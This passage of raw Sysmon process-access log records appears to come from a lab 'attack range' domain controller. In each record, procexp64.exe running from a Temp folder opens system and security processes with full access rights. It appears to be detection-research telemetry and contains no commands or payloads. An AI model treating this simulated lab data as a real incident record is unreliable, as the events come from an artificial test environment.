15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785029Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785028Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785151Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785150Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785149Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785148Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785147Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785146Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785145Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785144Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785143Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785142Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785141Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785140Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785139Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785138Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785137Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785136Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785135Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785134Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785133Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785132Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785131Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785130Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785129Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785128Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785127Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785126Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785125Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785124Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785123Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785122Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785121Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785120Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785119Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785118Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785117Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program 